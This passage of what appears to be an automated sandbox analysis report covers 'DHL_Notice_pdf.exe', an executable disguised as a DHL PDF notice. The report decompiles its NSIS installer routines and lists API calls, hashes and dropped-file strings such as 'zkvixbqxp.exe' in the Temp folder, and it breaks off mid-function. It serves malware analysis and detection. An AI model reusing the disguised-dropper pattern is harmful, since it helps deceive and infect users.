                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL_Notice_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 2803837635-2516555563
                                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                            C-Code - Quality: 77%
                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                            0x0040176f
                                                            0x00401776
                                                            0x00401782
                                                            0x00401785
                                                            0x0040178a
                                                            0x0040178d
                                                            0x00401794
                                                            0x004017b0
                                                            0x00401796
                                                            0x00401797
                                                            0x00401797
                                                            0x004017b6
                                                            0x004017bb
                                                            0x004017bb
                                                            0x004017bf
                                                            0x004017c2
                                                            0x004017c7
                                                            0x004017c9
                                                            0x004017cb
                                                            0x004017d0
                                                            0x004017d0
                                                            0x004017db
                                                            0x004017db
                                                            0x004017ec
                                                            0x004017ee
                                                            0x004017ee
                                                            0x004017ef
                                                            0x004017ef
                                                            0x004017f2
                                                            0x004017f5
                                                            0x004017f8
                                                            0x004017f8
                                                            0x004017ff
                                                            0x0040180e
                                                            0x00401813
                                                            0x00401816
                                                            0x00401819
                                                            0x00000000
                                                            0x00000000
                                                            0x0040181b
                                                            0x0040181e
                                                            0x00401874
                                                            0x00401879
                                                            0x004015b6
                                                            0x0040292e
                                                            0x0040292e
                                                            0x00402c2a
                                                            0x00402c2d
                                                            0x00402c2d
                                                            0x00000000
                                                            0x00401820
                                                            0x00401826
                                                            0x0040182d
                                                            0x0040183a
                                                            0x00401845
                                                            0x0040185b
                                                            0x0040185b
                                                            0x0040185e
                                                            0x00000000
                                                            0x00401864
                                                            0x00401864
                                                            0x00401865
                                                            0x00401882
                                                            0x00402c33
                                                            0x00402c33
                                                            0x00402c33
                                                            0x00401867
                                                            0x00401867
                                                            0x00401868
                                                            0x00401493
                                                            0x0040239d
                                                            0x0040239d
                                                            0x0040239d
                                                            0x00401865
                                                            0x0040185e
                                                            0x00402c35
                                                            0x00402c39
                                                            0x00402c39
                                                            0x00401892
                                                            0x00401897
                                                            0x004018a5
                                                            0x004018aa
                                                            0x004018b0
                                                            0x004018b4
                                                            0x004018b6
                                                            0x004018be
                                                            0x004018ca
                                                            0x004018b8
                                                            0x004018b8
                                                            0x004018bc
                                                            0x00000000
                                                            0x00000000
                                                            0x004018bc
                                                            0x004018d3
                                                            0x004018d9
                                                            0x004018db
                                                            0x00000000
                                                            0x004018e1
                                                            0x004018e1
                                                            0x004018e4
                                                            0x004018fc
                                                            0x004018e6
                                                            0x004018e9
                                                            0x004018f2
                                                            0x004018f2
                                                            0x00401901
                                                            0x00401906
                                                            0x00402398
                                                            0x00000000
                                                            0x00402398
                                                            0x00000000

                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                            • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,00000000,00000000,"C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                            • API String ID: 1941528284-4159427326
                                                            • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                            • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                            C-Code - Quality: 100%
                                                            			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                            0x004069dc
                                                            0x004069e5
                                                            0x004069e7
                                                            0x004069e7
                                                            0x004069eb
                                                            0x004069fe
                                                            0x004069f8
                                                            0x004069f8
                                                            0x004069f8
                                                            0x00406a17
                                                            0x00406a2b
                                                            0x00406a32

                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                            • wsprintfW.USER32 ref: 00406A17
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                            • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                            • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                            • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                            C-Code - Quality: 100%
                                                            			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                            0x00405ba4
                                                            0x00405ba8
                                                            0x00405bab
                                                            0x00405bb1
                                                            0x00405bb5
                                                            0x00405bb9
                                                            0x00405bc1
                                                            0x00405bc8
                                                            0x00405bce
                                                            0x00405bd5
                                                            0x00405bdc
                                                            0x00405be4
                                                            0x00405be6
                                                            0x00000000
                                                            0x00405be6
                                                            0x00405bf0
                                                            0x00405bf7
                                                            0x00405c0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405c0f
                                                            0x00405c13

                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                            • GetLastError.KERNEL32 ref: 00405BF0
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                            • GetLastError.KERNEL32 ref: 00405C0F
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 3449924974-3916508600
                                                            • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                            • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                            C-Code - Quality: 100%
                                                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                            0x0040618d
                                                            0x00406193
                                                            0x00406194
                                                            0x00406194
                                                            0x00406199
                                                            0x0040619a
                                                            0x0040619d
                                                            0x004061a2
                                                            0x004061a5
                                                            0x004061af
                                                            0x004061bc
                                                            0x004061c0
                                                            0x004061c8
                                                            0x00000000
                                                            0x00000000
                                                            0x004061cc
                                                            0x00000000
                                                            0x004061ce
                                                            0x004061ce
                                                            0x004061ce
                                                            0x004061d1
                                                            0x004061d4
                                                            0x004061d4
                                                            0x004061d7
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004061A5
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-1968954121
                                                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                            C-Code - Quality: 100%
                                                            			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsd7F3D.tmp\\", 7); // executed
				return _t4;
			}







                                                            0x00403c25
                                                            0x00403c34
                                                            0x00403c37
                                                            0x00403c39
                                                            0x00403c39
                                                            0x00403c40
                                                            0x00403c48
                                                            0x00403c4b
                                                            0x00403c4d
                                                            0x00403c4d
                                                            0x00403c4d
                                                            0x00403c54
                                                            0x00403c60
                                                            0x00403c66

                                                            APIs
                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                            • C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\, xrefs: 00403C5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsd7F3D.tmp\
                                                            • API String ID: 2962429428-1503489692
                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 643 401663-4022f6 call 401423 641->643 644 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->644 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 643->660 661 40292e-402935 643->661 644->660 663 40165b-40165e 644->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c33 650->653 653->649 667 4015fa-4015fd call 405b99 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                            C-Code - Quality: 86%
                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
